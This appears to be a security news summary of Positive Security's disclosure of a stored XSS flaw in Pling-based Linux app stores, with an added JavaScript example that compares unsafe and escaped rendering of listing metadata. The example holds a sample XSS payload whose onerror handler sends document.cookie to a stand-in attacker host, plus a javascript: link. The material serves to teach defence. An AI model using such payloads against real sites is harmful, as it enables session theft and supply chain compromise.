According to German cybersecurity firm Positive Security, Linux marketplaces based on the Pling platform are vulnerable to a cross-site scripting (XSS) flaw and could be susceptible to supply chain attacks.
Because the XSS payload executes in the context of other users, it could be leveraged to modify existing listings on a Pling store or to add new ones. That in turn opens the door to a supply chain attack: an attacker uploads a backdoored version of an application and then edits the metadata of a victim’s listing so that it includes the malicious payload, which unsuspecting users go on to install.
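The class of bug described above, as an added illustration that is not Pling's or Positive Security's code and does not reflect the store's real templates: a minimal listing renderer that interpolates user-controlled metadata straight into HTML (the unsafe pattern), beside a hardened version that escapes every field and restricts the link to http(s). The field names, the attacker host, and the payload are all constructed for this example.

```javascript
// Added example: unsafe vs. escaped rendering of user-supplied listing metadata.
// Field names (name, description, homepage) and the attacker domain are hypothetical.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Unsafe: whoever can edit the listing (or, via XSS, act as the owner)
// controls markup that every visitor's browser will execute.
function renderListingUnsafe(listing) {
  return `<div class="listing"><h2>${listing.name}</h2>` +
    `<p>${listing.description}</p>` +
    `<a href="${listing.homepage}">Homepage</a></div>`;
}

// Only http(s) URLs are allowed in href; anything else (javascript:, data:, garbage)
// is replaced with an inert anchor.
function safeHref(url) {
  try {
    const u = new URL(url);
    if (u.protocol === 'http:' || u.protocol === 'https:') return escapeHtml(u.href);
  } catch (_) {
    // unparsable URL falls through to the inert value
  }
  return '#';
}

// Hardened: every field is escaped for its context before interpolation.
function renderListingSafe(listing) {
  return `<div class="listing"><h2>${escapeHtml(listing.name)}</h2>` +
    `<p>${escapeHtml(listing.description)}</p>` +
    `<a href="${safeHref(listing.homepage)}">Homepage</a></div>`;
}

// Constructed malicious metadata: an onerror handler that exfiltrates cookies,
// plus a javascript: URL in the homepage field.
const maliciousListing = {
  name: 'Nice Theme',
  description: '<img src=x onerror="fetch(\'https://attacker.example/steal?c=\'+document.cookie)">',
  homepage: 'javascript:alert(1)',
};

// Crude detector used only to compare the two renderers: does the output
// contain an injected <img> tag or a javascript: link?
function containsActiveContent(html) {
  return /<img\b/i.test(html) || /href="javascript:/i.test(html);
}

console.log('unsafe:', renderListingUnsafe(maliciousListing));
console.log('safe:  ', renderListingSafe(maliciousListing));
```

The escaped output still carries the attacker's text, but as inert characters (`&lt;img ...`), and the homepage link collapses to `href="#"`; in a real store the same discipline has to be applied to every place metadata is rendered, including preview images, video embeds and download URLs, since a single unescaped field is enough for the stored XSS the advisory describes.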
The vulnerability was first found in the KDE Discover app store, but it also affects other Pling-based FOSS app stores, including store.kde.org, appimagehub.com, xfce-look.org, gnome-look.org, and pling.com.
To Read More: Securityweek